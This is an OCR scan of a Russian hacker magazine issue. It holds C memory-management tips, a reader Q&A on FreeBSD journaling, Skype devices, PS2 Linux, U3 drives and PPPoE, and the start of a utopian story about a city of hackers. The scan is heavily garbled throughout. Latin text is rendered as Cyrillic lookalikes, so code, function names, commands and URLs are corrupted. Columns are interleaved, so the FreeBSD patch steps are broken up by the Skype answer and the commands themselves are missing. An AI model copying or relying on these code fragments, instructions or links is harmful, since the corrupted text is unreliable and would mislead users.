р = ту_таІІос(ВІ_ОСК_8І2Е); 

Іоо(р, п); 
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ТРЮКИ ОТ КРЫСА 




Этот пример уже поддерживает возможность 
дефргамѳнтации динамической памяти в 
однопоточных программах. В чем разница? 
Теперь функция ту_таІІос возвращает не 
указатель на выделенный блок, а указатель 
на переменную, хранящую указатель на вы- 
деленный блок. Функции іоо передается уже 
неэффективный адрес ячейки памяти, аука- 
затель-на-указатель р и смещение нужной 
ячейки относительно начала блока. Функция 
іоо и все остальные функции не могут, не 
имеют правахранить эффективные адреса в 
статических переменных или передавать их 
кому-либо еще. Вместо этого они при каждом 
обращении к ячейке должны выполнять опе- 
рацию (*р+п), причем перемененная р долж- 
на быть объявлена как ѵоіаіііе, что запретит 
компилятору помещать ее в регистр. 

Теперь наш менеджер кучи, представляющий 
собой надстройку над таііос, может беспре- 
пятственно двигать блоки, высвобождая не- 
прерывные регионы требуемой длины. Для 
обеспечения когерентности и взаимной не- 
противоречивости дефргаментация должна 
осуществляться внутри вызова ту_таІІос, 
да и то только в однопоточных программах. 
С многопоточными этот трюк не сработает, 
поскольку акт обращения к ячейкам памяти 
не является атомарным действием. Допустим, 
один поток вычислил эффективный адрес 
ячейки и только собрался к ней обратиться, 
как другой поток в это время передвинул блок 
на другое место! Следовательно, каждый по- 
ток должен иметь свою кучу, а передача дан- 
ных от одного потока к другому обязана защи- 
щаться критическими секциями или другими 
средствами синхронизации. 

В итоге мы получим более тормозной и гро- 
моздкий код, что есть минус. Но зато теперь 
можно забыть про фрагментацию кучи, что 
есть плюс. 

О По ссылке или по значению 

Язык Си поддерживает два способа пере- 
дачи переменных: по ссылке и по значению, 
порождая тем самым извечную проблему вы- 
бора. Программистское сообщество разби- 
лось на два больших лагеря, отстаивающих 
свои взгляды на дизайн программирования и 
ожесточенно воюющих между собой. 

Один лагерь говорит, что все, что помещается 
в регистр общего назначения (то есть физи- 
чески представляет собой байт, слово или 
двойное слово) передается по значению, ос- 
тальное — по ссылке, потому что это гораздо 
быстрее и требует меньше памяти. 

Другой лагерь с этим категорически не со- 



гласен: кому сейчас нужна быстрота? А 
потребности в памяти всегда может удовлет- 
ворить новый ЭІММ. Передача переменных 
по ссылке потенциально опасна и вносит 
большую сумятицу, поскольку при передаче 
по значению функции передается копия пе- 
ременной, которую она может модифициро- 
вать как угодно, не затрагивая оригинал. А 
вот при передаче по ссылке возникает угро- 
за непреднамеренной порчи данных. Кроме 
того, при чтении листинга становится непо- 
нятно, то ли мы просто передаем значение 
функции, то ли принимаем через нее возвра- 
щенный результат. 

Формально запретить модификацию пере- 
менной, переданной по ссылке, можно через 
квалификатор сопзі, однако надежной такую 
защиту не назовешь, поскольку сопзі легко 
обходится через преобразование типов (как 
преднамеренное, так и нет). С другой сторо- 
ны, передавать большие объемы данных по 
значению смерти подобно, особенно в рекур- 
сивных функциях или при глубоком объеме 
вложенности. 

Но есть выход: передаем переменные по 
ссылке, для наглядности предварив их сопзі, 
а на физическом уровне защитив от моди- 
фикации вызовом ѴігіиаІРгоіесі(,,РАОЕ_ 
ВЕАЭ01\11_У,). Естественно, при выходе из 
функции защиту необходимо восстановить. 
Пользователи коммерческих компиляторов 
(вроде Місгозоіі ѴізиаІ С++) вынуждены де- 
лать это вручную (что чревато ошибками), 
а вот ОСС, бесплатно распространяемый в 
исходных текстах, позволяет свободно моди- 
фицировать прологи эпилогкаждой функции 
по своему усмотрению. 

Кстати говоря, здесь мы снова сталкиваемся 
с невозможностью реализации данного меха- 
низмов многопоточных программах, посколь- 
ку в то время пока одна функция «защитила» 
переменную, никакая другая функция чужого 
потока не может ее менять, даже если ей это 
действительно необходимо. Одно из главных 
достоинств ІІІЧІХ'а как раз и заключается в 
том, что в нем потоки играют второстепенную 
роль и, вообще говоря, не слишком популяр- 
ны. А вот в ѴѴіпбоѵѵз. . . задачи синхронизации 
приходится решать вручную. Как говорится, 
создавая потоки, мы создаем себе проблемы, 
но это уже другая тема. 

О Инициализировать или нет 

Программисты, особенно начинающие, час- 
то инициализируют то, что инициализируется 
само (а соответственно, принудительно обну- 
лять его не нужно). Хоть это и не вредит, но от- 










нимает время каку процессора, так и у самого 
программиста. 

Статические и глобальные переменные всег- 
да инициализируются нулями еще на стадии 
загрузки РЕ/ЕІ_Р-файла в память, причем эта 
инициализация обходится очень дешево (в 
смысле процессорного времени), поэтому 
массивы (особеннобольшие)лучшевсегораз- 
мещать в статических переменных. Правда, 
при этом функция становится нерентабель- 
ной, то есть ее нельзя вызывать рекурсивно 
или одновременно из нескольких потоков (ох, 
опять эти потоки!). Кроме того, при повторном 
вызове функции статические переменные бу- 
дут содержать значения, оставленные преды- 
дущим вызовом, и если функцию планируется 
вызывать многократно, то инициализировать 
переменные все-таки придется. 

Память, выделенная функцией ѴігіиаІАІІос, 
также автоматически инициализируется ну- 
лями, о чем сказано в первом же абзаце до- 
кументации («МетогуаІІосаіеб Ьуібізіипсііоп 
І5 аиіотаіісаііу іпіііаіігесі іо гего, ипіезз іііе 
МЕМ_РЕЗЕТ ііад із зеі»), да только кто же эту 
документацию читает. . . 

Функция таііос не инициализирует выделяе- 
мую память (во всяком случае по Стандарту), 
но в реализации от Місгозоіі при выделении 
блоков от 512 Кб и выше она обращается к 
ѴігіиаІАІІос, в результате чего происходит не- 
явная инициализация памяти. Правда, ника- 
ких гарантий, что поведение функции не изме- 
нится в следующих версиях, у нас нет, так что 
пусть каждый решает сам, использовать ли 
ему эту недокументированную особенность 
или же свято придерживаться его величества 
Стандарта, в котором, кроме таііос, предус- 
мотрена функция саііос, выделяющая иници- 
ализированную память. Надеюсь, никто неза- 
метит,что«р = саІІос(ВІ_ОСК_ЗІ2Е);» намного 
короче и нагляднее, чем «р = таІІос(ВІ_ОСК_ 
ЗІ2Е); тетзеі(р, 1, ВІ_ОСК_ЗІ2Е);», хотя 
Місгозоіі могла бы свободно избавиться от 
лишнего цикла инициализации, если бы блок 
памяти был выделен ѴігіиаІАІІос, но, увы, она 
этого не сделала. 

Наконец, существуют ситуации (правда, их 
довольно немного), когда начальное значе- 
ние переменной совершенно некритично, 
поэтому ее можно не инициализировать, 
пропуская протест компилятора мимо ушей. 
Вот, например, реализация «пропеллера»: 
«ргіпіі("% с\г " , " -\\І /" [ 2 -г + % 4]);». Совершенно 
очевидно, что инициализировать перемен- 
ную 2 излишне, хоть это и влияет на началь- 
ное положение «лопасти», но... кто же на 
него обратит внимание? НС 
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О: Слышал, что к РгееВГ Ю 6.1 (спасибо 
за дистрибутив на диске) можно при- 
крутить журналируем э файловую 
систему ІІГ52. Перерыл все мануалы 
к системе, но ничего путного так г 
нашел. Как же так? 

А: В стабильных версиях РгееВЗЭ и вправду 
возможно ДОдклТЬчитьДОлнбІдеі-іную журчали- ' 
руемую систему. Правда, придется немного 
пропатчить ось, но, к счастью, выполнить это 
довольно просто. Итак, все по порядку: 

1 . Прежде чем приступать непосредственно 
к патчингу, выполним вспомогательные приго- 
товления. Зайди в каталог /изг/згс и создай там 
необходимые директории: 



ЫРЗ_ОПОЫЯ[\ІАІ_», пересобираем ядро ( ѵмѵѵѵ. 
зигаиІпеІ.ги/раае'.рІір?іб=9 ) и отправляем ма- 
шину в ребут. 

5 . Теперь нужно подгрузить специальной мо- 
дуль с помощью команды: 



6 . Чтобы подключить журнал к определенно- 
му разделу, его предварительно необходимо 
размонтировать. Для примера возьмем раз- 
дел '/сІеѵ/асІОзЗсГ и точку монтирования — / 
тпІ/и{з21езІ 






О: Какие гаджеты к §куре бывают? 

А: А: Самое простое — это Зкуре-телес|юн. 
Бывают как проводные, так и беспроводные 
варианты. В любом случае, аппарат подклю- 
чается через ІІЗЕІ к компьютеру и с помощью 
установленного драйвера взаимодействует 
со Зкур’ом. Такиё трубки оборудованы дисп- 
леем, на котором отображается контакт-л[іст, 
поэтому ты без труда можешь вызвать лкфой 

из контактов или просто телефонный номер. 

^ 1 



2 . Далее можно закачать сам патч и вноаить в 
систему изменения: 



ЧеІсГі ІпЩрѴ/реорІеЧгееЬзсІ.огд/— рісі/раісіпез/діоигпаіб. 



3. После этого рекомендуется пересобрать 
часть системы, для чего необходимо после- 
довательно зайти в каталоги /изг/згс/іпсіибе/, 
/изг/згс/зЬіп/деот/сІаз^/, /из|згс/з1|іп/тоипі/ и 
выполнить заветную последовательность ко- 
манд 'таке; таке іпзіаІІ; таке сіеагі'. 



Принять звонок ты сможешь нажатием од- 
ной кнопки, не забывая о встроенно м АС ІНе, 
который отобразит на дисплее телефона имя 
контакта или номер вызывающего абонента. 
Некоторые современные модели телефонов 
также оборудованы веб-камерой для органи- 
зации видеоконференций. Одной из таких 
трубок является МЗВ Ѵібео РИопе (ІІ5В-Р4Ѵ). 
Кроме этого, широко распространены Спе- 
циальные адаптеры (например, ЫЗВ ТеІЬох), 
позволяющие использовать 8куре с помощью 
8 . Монтируем раздел ^теперь уже с подклю- обычной телефонной, трубки. Устройство 



7 . Настало время подключить журнал: 



ченным журналом, обратно: 



, тоипі -о азупс.дрита! /Цеѵ/асЮзЗ.ригпаІ /тпі/иіагіезі 



Готово! 
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представляет собой аналого-цифровой пре- 
образователь и связывает между собой теле- 
фон с аналоговым сигналом и Зкуре, который 
полностью работает в цифре. 

Еще один интересный девайс — Зкуре-шлюз. 



ХАКЕР 09 /93/ 06 



ЗАДАВАЯ ВОПРОС, ПОДУМАЙ! НЕ СТОИТ 
МНЕ ПОСЫЛАТЬ ВОПРОСЫ, ТАК ИЛИ ИНАЧЕ 
СВЯЗАННЫЕ С ХАКОМ/КРЭКОМ/ФРИКОМ 
— ДЛЯ ЭТОГО ЕСТЬ НАСК-РАО (НАСКРАО@ 
РЕАЬ.ХАКЕР.РЫ), НЕ СТОИТ ТАКЖЕ ЗАДА- 
ВАТЬ ОТКРОВЕННО ЛАМЕРСКИЕ ВОПРОСЫ, 
ОТВЕТ НА КОТОРЫЕ ТЫ ПРИ ОПРЕДЕЛЕН- 
НОМ ЖЕЛАНИИ МОЖЕШЬ НАЙТИ И САМ. Я 
НЕ ТЕЛЕПАТ, ПОЭТОМУ КОНКРЕТИЗИРУЙ 
ВОПРОС, ПРИСЫЛАЙ КАК МОЖНО БОЛЬШЕ 
ИНФОРМАЦИИ. 










С одной стороны он подключается к Зкуре, а с 
дрѵ _ ой — через обычный телефонный шнур в 
гор эдскую телефонную сеть. Таким образом, 
он дозволяет перенаправлять всех, кто вызы- 
вает тебя по инету, на городской или мобиль- 



ный номер. Шлюз сам вызываетнужный номер 
по обычной телефонной линии и обеспе чива- 
ет передачу голоса между ней и Зкур’ом. Воз- 
можен и обратный вариант, когдд. звон ки н^_ 
твой городской номер, к которому подключен 
шлюз, бесплатно перенаправляются на Зкуре- 
контакт или же на телефонный номер в любую 
страну мира по тарифам ЗкуреОиі. Вещь по- 
истине потрясающая. Примером такой игруш- 
ки является ІІЗВ Зкуре Оіѵеітег (ІІЗВ-ВЗѲ). 

О: Один товарищ втирает мне, что на 
приставку 8опу РІау$1а(іоп 2 легко ус- 
ивается І_іпих. Врет, наверное? 
Ведь ни жесткого диска, ни даже эле- 
мента управления, кроме джойстика, у 
консоли нет? 

А: Жесткого диска и клавиатуры у Р|э2 по 
умолчанию действительно нет. Но подключить 
их можно. Мало того, Зопу выпустила (Специ- 
альный набор линуксоида (Тбе І_іпих кіі іог 
РГауЗІайоп 2), в который входит ѲШ-с|пера- 
ционная система, ІІЗВ-клава и мышь, адаптер 
ѴОА, сетевушка, а также жесткий диск на 40 Гб. 
Для работы операционной системы в прі|став- 
"кё должна быть установлена карта памяти на 
8 Мб, которую придется отформатировать 
во время инсталляции лицукса. Установка, 
кстати говоря, может вызвать некоторые за- 
труднения, потому как система базируется 
на японском дистрибутиве Копбага І_іпих, 
большая часть которого в свою очередь поза- 
и мствована у старо й шапк и (В еб Н а! Ыг их), а 
поэтому часть действий придется выполнить 
в командной строке. Используемое системой 
ядро старовато — 2.2.1, но его можно легко 
проапдейтить до 2.2.26, 2.4.32 или 2.6.16. Для 
справки скажу, что приставка оборудована 
всего 32 Мб оперативной памяти, что чрез- 
вычайно мало для современных прилох ений. 
Поэтому тот же самый РігеТох будет работать 
очень медленно, а разработчики вообще ре- 
комендуют юзать только консольные гароги. 
Зато к ІІЗВ-портам приставки можно подклю- 
чить принтер, камеру, флеш- 
СОДЗѴО-привод. Подробный РАО по теме ты 
найдешь на уѵѵѵѵѵ.рІаѵ5Іа1іоп2-Ііпих.сот/Іад. 
рГір . а также на нашем диске. 

К слову, превратить Р32 в компьютер мож- 
но иначе. Существует спеі_ /іальный диск, на 

котором установлен инте эпретатор языка 

Г 

УаЬазіс. фускай сложные приложения с его 



помощью не создашь, но для того, чтобы пос- 
тичь азы программирования, его будет белее 
чем достаточно. Кроме этого, для Р32 сущест- 
вует специальный порт ЫеіВЗО. 

О: Моя старенькая, но зато стабильная 
и уже давно ставшая родной материнка 
не держит ни 11§В 2.0, ни ГігеѴѴіге. Что 
жр мне рстадтся: .смириться и юзать 
тормозной 11§В 1.1 (перекачивая 1 Гб с 
карты памяти сфтоаппарлі полдня) 
или тратиться на новую материнку? 
Другого варианта нет? 

А: Конечно, лучше будет задуматься об 
апгрейде материнской платы. Ведь если нет 
ІІЗВ 2.0, то существуют и другие ограничения 
(например, отсутствует ЗАТА-контроллер). 
Но, вообще говоря, без замены материн- 
ки можно обойтиои. Сойчао роого оа 10 16 
долларов можно купить РСІ-контроллір, в 
котором будут и ІІЗВ 2.0, и РігеѴѴіге-порты. 
Работают такие контроллеры безупречно 
и в большинстве случаев даже не требуют 
установки драйверов. А тот же ЗАТА-винт 
тогда возможно будет подключить, восполь- 
зовавшись переходником с ЗАТА/ЮЕ на ІІЗВ 
2.0 (это еще $20-40). Информация о таком, 
пока еще редком девайсе представлена на 
сайте ИДр://1Иа.ги/з1огаае/ра1а ібе заіа изб/ 
операде.іпіті . 

О: В характеристиках флеш-накопите- 
лей все чаще встречается а 
ра 113. Что это за зверь и какая флешка 
лучше: с 113 или без нее? 

А: 1)3 — это новый стандарт форматирова- 
ния ІІЗВ-накопителей, в который залАжен 
принцип «подключил и работай». Сразу пос- 
ле подключения флешки в системе появляет- 
ся два раздела: один (небольшой) — в^иде 
СО-ВОМ, другой (большой) представлен как 
съемный накопитель. На первом размещает- 
ся утилита І_аипсИРасІ, представляющая со- 
бой удобную панель для запуска программ. 
Поскольку раздел опознается операцион- 
ной системой как СО-ВОМ диск, І_аипсгіРасІ 
запускается автоматически. Своим видом 
І_аипсНРасІ сильно напоминает системное 
меню Пуск, только здесь слева находится 
программ, которые можно запустить с 
флешки, а справа — список возможных дейс- 
твий для управления диском и программами. 
Остальная часть флешки, определяющаяся 
как сменный накопитель, своей работой ни- 
чем внешне не выделяется. 

Кроме автозапуска І_аипсНРасІ, технология 
1)3 позволяет программам работать в сво- 




ем собственном окружении, без предва 
тельной инсталляции. Адаптированные) для 
1)3 приложения справе взаимодействовать 
с файлами и реестром хост-машины, как 
если бы они были установлены в систему. 
При этом все внесенные ими изменения от- 
катываются, каи только флешка будет вы- 
тащена из компьютера. К сожалению, все 
это возможно флько в том случае, когда 
разработчики конкретной программы поза- 
Ч5отрисьшзовмест.и мести с платформой 1)3 
(ЗОК для программеров доступен на сайте 
уууууу.иЗ.сот ). Радует то, что таких.программ 
становится все больше и больше. Кстати, 
на ѲѴО ты найдешь подборку подобных при- 
ложений. С учетом того, что цена ЕІЗ-накопи- 
телей ничем не отличается от обычных фле- 
шек, выбор очевиден. Зачем отказываться 
от подобной возможности, которая т|к и 
норовит стать массовой? 







О: Чтобы і льзоваться внут нни- 

ми ресурсами АО$І_-пров<: 
не тарифицирую гея и бесплатны), мне 
необходимо устанавливать отдел ьное 
РРРоЕ-со ние с особыми парамет- 

рами. Переключаться между соедине- 
ниями жутко неу но ли 

на одной сетевой карте исп іьзовать 
сразу и то, и ? 

АТут“едует7іару сл'ов сказать о том, что 
вообщесобойпредставляетРРРоЕ.Этойро- 
токол для установки РРР-соединений чірез 
ЕіИегпеі-адаптеры. Предоставляя важные 
дополнительные возможности, он наибо- 
лее востребован всевозможными ОЗІ_-сер- 
висами. Однако использовать одновремен- 
нодваРРРоЕ-соединения наодном сетевом 
адаптере по умфічанию нельзя. Все дело в 
драйвере^которйый установлен в ѴѴіпбоѵѵз по 
умолчанию. Чтобы это ограничение обойти, 
придется прибегать к ромощи альтернатив- _ 
ных клиентов, наиболее популярным из ко- 
торых является .ВАЗРРРоЕ ( ѵѵѵѵѵѵ.газрррое. 
сот ). Драйвер прозрачно устанавливается 
в систему и далее представляет сетевой 
адаптер в качестве модема, позволяя под- 
нимать РРРоЕ-соединение с помощью ба- 
нального диалаці-мастера. При этом впрлне 
использовать ІШегпеі Соппееііоп 
ЗИагіпд (Общий доступ к подключению 
интернета) и, что самое главное, устанав- 
ливать несколько одновременных сессий 
через одитгеете вой адаптер. А именно это ■ 
тебе и нужно. П здроаные инструкции с ил- 
люстрациями ты найдешь на сайте ИДр:// 
зиррогІ.каІида.ги/Іипе/ргеЛх.зНІтІ . =Н= 
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ОТРОЙКОВ ЛЕОНИД 



60КОО . 
ХДКЕКОѴ/ 



РАССКАЗ-УТОПИЯ 



Иллюстрации: сЫІІ-дип (Шр://сЫІІ-дип . ІіѵеригпаІ. сот ) 



поск кпоск. . . ѵѵаке ир, ІЧео! 

Он открыл глаза и сладко потянулся в постели. Из окна 
тянулись теплые солнечные лучи, предвещая отличный 
день. ІЧео с удовольствием бы еще повалялся, щурясь на солнышке, 
но нужно было вставать. Предстоял важный день. 

— Который час? — вслух спросил он. 

— Семь часов тридцать минут, — женским голосом ответил ком- 
пьютер. — Доброе утро, Ыео. 

Программу-оболочку «Сара» для своего Меда-РС Ыео написал сам 
в 1 4 лет. Нужно было только задать вопрос, и Сара сама искала всю 
нужную информацию в информационной системе Хаксити, озвучивая 
ее своему хозяину. Конечно, можно было купить одну из стандартных, 
как поступали все его ровесники. Но для Ыео это был еще один вызов, 
очередная ступенька к будущей славе. А в том, что его ждет большой 
успех, не сомневался никто. Ыео с детства выделялся среди остальных 
детей. В 6 лет уже с интересом изучал мануалы по ТСР/ІР, в 1 0 знал 
наизусть все ВЕС, а в 12 написал навороченный клон операционной 
системы ВЗО. Конечно, не малую роль тут сыграли родители. Отец — 
почетный хакер при мэрии, которому поручают сложнейшие взломы. 
Мать — руководитель отдела программистов в центральном интернет- 
провайдере города. А бабушка — настоящая легенда, она принимала 
участие в создании Хаксити. І\ІЕТ. Неудивительно, что первым словом, 
произнесенным Ыео, было «кряк». 

— Уже встал? Вот молодец, — в комнату зашла мама. — Завтрак на 
кухне, чекай мыло, умывайся и садись за стол. 

Ыео напоследок потянулся, сбросил с себя одеяло и сел за комп. 

Его взгляд задержался на волпейпере. Картинка висела на рабочем 



столе уже несколько недель, но Ыео не уставал смотреть на нее. Это 
была золотая статуэтка с изображением Кевина Митника — награда, 
которую вручают лучшему хакеру года. Почетный знак, открывающий 
двери в любые компании Хаксити, заслуживающий уважение всех 
жителей. Конкурс на лучшего хакера проводился раз в году, принять 
в нем участие могли шестеро специально отобранных учащихся, 
представляющих каждую из 12-ти школ. Победитель, получающий 
статуэтку, был только один. Ыео был фаворитом 7-й школы и основ- 
ным претендентом на главный приз. Лучший ученик в классе, автор 
десятков популярных эксплоитов и документаций, в конце концов, 
человек, которому удалось взломать главный сервер «Ыеигопісз», 
крупнейшей компании города. Ыео и сам знал, что он на голову выше 
конкурентов, но все равно нервничал. А вдруг. . . вдруг кто-то окажется 
еще лучше? 

— Да ты не напрягайся, сын! — поддержал за столом отец. — Мы 
же с тобой знаем, что ты — лучший! Чувак, да ты писал экплоиты на 
С, когда они еще пешком под стол ходили. Давай, сынок, не дрейфь. 
Задай им жару! 

Хороший все-таки у него отец. Правда, извращенной порнушкой ув- 
лекается, которую наивно прячет в зашифрованной папочке на своем 
ноуте, но в целом мужик нормальный. 

— Собирайся, сегодня тебя подкину. Помни, мы в тебя верим. 

Ыео кивнул и пошел собирать школьное барахло. В рюкзак посы- 
пались чипы с интерактивными учебниками: «Ассемблер для Г уру. 9 
класс», «Спецификации ядра ІІМХ», «Метанализ и компилирование», 
«Нейронные алгоритмы в криптографии». Он считал, что попросту 
теряет в школе время, поскольку мог бы давно сам писать подобные 
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книги. 

Ыео вышел на улицу — у подъезда его уже ждал серебристый ВМѴѴ 
отца с надписью вместо номеров: «СгаскесІ Ьу ВШ ОіІЬегІ». 

— Ну что, поехали? — жизнерадостно спросил батя, выглядывая из 
окна. 

— Гоу, — ответил сын, залезая внутрь. 

* * * 

Для случайно забредшего в Хаксити туриста, город представлял 
необычайное зрелище. В первую очередь это касалось названия 
улиц и архитектуры построек. Центром города была Файрвольная 
площадь, где возвышался громадный памятник Линусу Торвальдсу, 
а неподалеку находилась Мэрия, сверху которой виднелись знамени- 
тые Двоичные часы. В разные стороны от центра отходили Стековая 
улица, Вирусный проспект, улица Т рех кодеров и Арріе-стрит. Все они 
были заполнены бесчисленными компьютерными магазинчиками, 
интернет-кафе, провайдерами, софтварными фирмами и кафешка- 
ми, отделанными в духе виртуальной реальности. Все — от мала до 
велика — носили при себе ноутбуки, КПК, ѴѴі-Рі сканнеры и прочую 
аппаратуру, пользуясь ими при первой же возможности. Некоторые 
работали на ноуте прямо на ходу, удерживая компьютер на лямках, 
прикрепленных к шее. Неудивительно, что у каждого из жителей Хак- 
сити было полно дел: нужно было проверить кучу емейлов, прочитать 
сообщения на популярных электронных досках, скачать свежий софт, 
чтобы не отстать от жизни, взломать компьютеры врагов и защитить 
свой от ежедневных посягательств. В Хаксити. ЫЕТ хостилось 340 
тысяч сайтов — именно столько жителей проживало в городе. И 
каждый из этих сайтов ежедневно подвергался хакерским атакам. Ад- 
мины ставили новые защиты, скачивали свежие патчи, отслеживали 
мегабайты логов, но все это не для того, чтобы помешать очередному 
взлому. Избежать хаков было невозможно. Все это было неотъемле- 
мой частью жизни каждого горожанина. И те, кто еще недавно борол- 
ся с проникшим в систему хакером, через пару часов сам становился 
злостным взломщиком, пытаясь обойти ловушки админов. 

Детям, рождающимся в Хаксити, не давали имен и фамилий — они 
получали никнейм, уникальный для каждого. Они могли не уметь 
читать и писать, но знали, как создать страничку в сети и привлечь 
к ней посетителей. Продвинутый компьютерщик мог найти в этом 
городе работу на каждом углу, но особенно здесь ценились матерые 
хакеры. Лучшие из них становились настоящими героями, кумирами 



молодежи. Например, ЗІаскегОѵегтіпсІ — 40-летний хакер, несколько 
лет назад придумавший защиту, которую никто не мог взломать, и 
потом сам же хакнул ее. Или ОепіизРго, таинственный хакер, который 
в последний день каждого месяца на протяжении уже нескольких 
лет взламывал 1 00 случайных сайтов Хаксити. ЫЕТ, оставляя на них 
зашифрованное послание. Таких примеров в истории Хаксити было 
много, и каждый житель города стремился стать очередной легендой. 

В отличие от других городов в Хаксити люди любили ездить обще- 
ственным транспортом. В автобусах, троллейбусах, такси можно было 
услышать непрекращающиеся споры о том, какой брандмауэр круче, 
как лучше всего оптимизировать код и какая система более защи- 
щенная. Эти проблемы волновали каждого жителя, и даже старушка 
в пестрой косынке могла загрузить тебя специфичными терминами, а 
напоследок обозвать ламером и отправить учить матчасть. 

Удивленный всем этим турист, конечно, захочет узнать, что это за 
город и откуда он взялся. Для этого ему достаточно подойти к любому 
прохожему и задать свой вопрос. Историю создания Хаксити знали 
все. Турист услышал бы занимательный рассказ о том, как много лет 
назад ^50п и КгоІ — двое талантливых хакеров, возмущенные плохим 
отношением властей к сетевым взломам, перебрались на это место 
и решили основать уголок, где хак станет во главе всего. Первыми 
жителями Хаксити стали друзья и знакомые основателей, такие же 
отчаянные хакеры, как они, которые соорудили себе жилища, заку- 
пили оборудование, провели между домами сеть и стали жить-пожи- 
вать. Со временем слава о городе хакеров разрослась, сюда стали 
съезжаться компьютерные гуру со всех уголков света, и Хаксити из 
небольшой колонии превратился в процветающий самодостаточный 
город, аналогов которому нет. 

* * * 

Ыео вошел в здание школы и сразу же ощутил на себе сотни взгля- 
дов. Для многих он уже был победителем, даже девочки, к которым он 
раньше не проявлял никаких знаков внимания, сегодня смотрели на 
него по-особенному. 

— Здаров, старина, — хлопнул его по плечу друг МедаІоісІ . — Ну ты 
как, подготовился? Мы тут все за тебя. 

— Да, перед смертью не надышишься, — отшутился Ыео. На самом 
деле он привирал. К этому дню Ыео готовился много недель, в течение 
которых выучил все оставшиеся языки программирования, которые 
еще не знал, освоил на всякий случай операционные системы для 
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ламеров, прочитал пару сотен компьютерных книг и изучил конспекты 
всех прошедших лекций. Ыео был готов к любым, даже самым слож- 
ным и каверзным вопросам. Он не мог подвести всех, кто в него верил. 

По коридору разнеслась трель звонка, объявляющего о начале уро- 
ка. Несмотря на Конкурс, занятий не отменяли, так что приходилось 
отсидеть несколько часов за партой. 

Ыео и МедаІоісІ отправились в класс, где их уже ждала учительница 
І_еРарігіі5. Бледная, с высохшей сморщенной кожей, она напомина- 
ла личинку жука муравьеда. Но у учеников І_еРарігиз пользовалась 
уважением. Тетка как-то вызвала на хакерскую дуэль известного 
секурити-спеца Оо^иапо и за полчаса умудрилась взломать сайтов в 
два раза больше него. А еще поговаривали, что она скрылась в Хакси- 
ти от преследования французской полиции, после того как взломала 
местный банк. 

— Садитесь, дети, — басистым голосом объявила І_еРарігиз и бро- 
сила теплый, полный немого обожания взгляд на Ыео. А ведь когда-то 
старуха не соглашалась с его идеями в ассемблерных программах, 
заданных на дом. Называла их бездарными. И вот теперь он без двух 
минут лучший хакер года в Хаксити, а кто она? Просто училка хакерс- 
кого программирования. 

Урок начался, и І_ерарігиз приступила к монотонному изложению 
материала. «Последние системы защиты включают в себя макро- 
скрипт, который сверяет текущее состояние сервера с состоянием его 
1 0-минутной давности. И если изменения критические, то скрипт по- 
дает тревожный сигнал админу. Сегодня мы рассмотрим, как обойти 
это с помощью небольшой программки на С». Ыео откровенно скучал, 
как, впрочем, всегда на уроках. Его мысли стали потихоньку уноситься 
за пределы класса, куда-то вперед, в будущее. Вот он выигрывает 
Конкурс, далеко опередив по баллам всех своих соперников. Все 
поздравляют его бурными аплодисментами. «Сын, красава!» — кри- 
чит отец. «Весь в бабку!» — смахивает слезу бабуля. «Я хочу от тебя 
детей», — признается Бису, самая красивая хакерша в школе. К нему 
подходит мэр города, когда-то сам победитель Конкурса, вручает ста- 
туэтку Золотого Митника и крепко пожимает руку. Журналисты «Хак- 
сити ІЧЕѴѴЗ» облепливают І\Іео со всех сторон, спеша первыми взять 
интервью. А потом подходит Медаігоп — владелец « Ыеигопісз» — и 
предлагает возглавить их хакерский отдел. Потому что знает: никто не 
справится с этим лучше, чем он, ІЧео. «Может быть, ты знаешь, ІЧео?» 

Вопрос училки застал его врасплох. Он очнулся от мечтаний и заме- 



тил, что І_ерарігиз смотрит на него, терпеливо ожидая ответа. 

— Простите? 

Кому-то другому наверняка бы достался выговор — І_ерарігиз не 
любила, когда ее не слушают. Но только не Ыео. Только не сегодня. 

— Мы пытаемся определить оптимальный алгоритм обхода систе- 
мы сверочной защиты, — подбадривающе сообщила учительница. 

Ыео встал и уверенным шагом проследовал к планшетной доске. 
Затем взял электронный мел и стал быстро рисовать формулы, писать 
части кода, попутно все это кратко комментируя. Когда он закончил, 
учительница восторженно выдохнула: 

— Превосходно! Пять с плюсом! 

Ыео хмыкнул и сел на свое место. Т ревожат по всяким пустякам . . . 

На перемене І\Іео сидел на подоконнике в окружении друзей. 

— Во напьемся завтра. Ты ж проставишься? — спросил Маезіго, не- 
плохой софтварный крэкер, который тоже подавал заявку на участие 
в Конкурсе, но не прошел отбор и теперь поддерживал друга. 

— Ясное дело. Но надо еще выиграть. 

— Нуты брось дурачком прикидываться! — зашумели хакеры. 

Внезапно шум утих — рядом с компанией появился Зозізка, неоп- 
рятный толстяк в огромных очках, которого все считали законченным 
лузером и зубрилой. Над Зозізк’ой прикалывались все, причем не 
только из-за внешности. Каждый из хаков, которые он пытался совер- 
шить, заканчивались смехотворным провалом. Однажды, когда на 
дом задали написать программу, сверяющую отпечатки пальцев с ба- 
зой данных, Зозізка что-то напутал, и вместо отпечатков пальцев его 
программа сверяла отпечатки подошв. А когда взломал компьютер 
школы, чтобы подправить себе отметки (так делали почти все учащие- 
ся Хаксити) и попутно наказать главного недруга, перепутал строчки и 
поставил пятерку врагу, а себе пару. Словом, с толстяком вечно что-то 
случалось, что вызывало насмешки у всей школы. К удивлению всех, 
Зозізка решил принять участие в Конкурсе, но еще больше все уди- 
вились, когда он вошел в число 6-ти представителей школы. Конечно 
же, никто не догадывался, что к этому приложили руку ІЧео с друзьями, 
замолвившие за толстяка словечко. Более нелепого претендента на 
приз быть не могло — в этом и была вся соль. Парням не терпелось 
посмотреть, что вычудит на Конкурсе этот лузер. 

— Ну что, Сосисыч, готов к бою? — поинтересовался один из при- 
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ятелей. 

— Всегда готов! — простодушно улыбнулся Зозізка. — И вдруг 
шмякнулся на пол, поскользнувшись на брошенном кем-то яблочном 
огрызке. 

В компании Ыео раздался дружный смех. 

— Ну я это, пойду, ребят, — покраснев, сказал толстяк. 

— Давай, давай. Г лавное — не заблудись по дороге в Дворец 
Бэббиджа. 

Когда Сосиска ушел, Маезіго спрыгнул с подоконника и, кривляясь, 
принялся разыгрывать сцену награждения Сосиски мэром. 

— О, уважаемый Сосис Сосисыч. Т ы удивил всех! О, как мы в тебе 
ошибались, но больше не будет заблужденья! Теперь ты лучший 
хакер в городе. Нет, в мире! И статуэтка золотого Митника по праву 
принадлежит тебе. 

Маезіго с пафосом воздал руки, удерживая невидимую статуэтку, и 
друзья взорвались дружным смехом. 

Перед тем как вернуться в класс, Ыео столкнулся с Бису и от неожи- 
данности даже уронил рюкзак. Чипы с учебниками рассыпались по 
бетонному полу. Ыео поспешно наклонился и принялся их собирать, в 
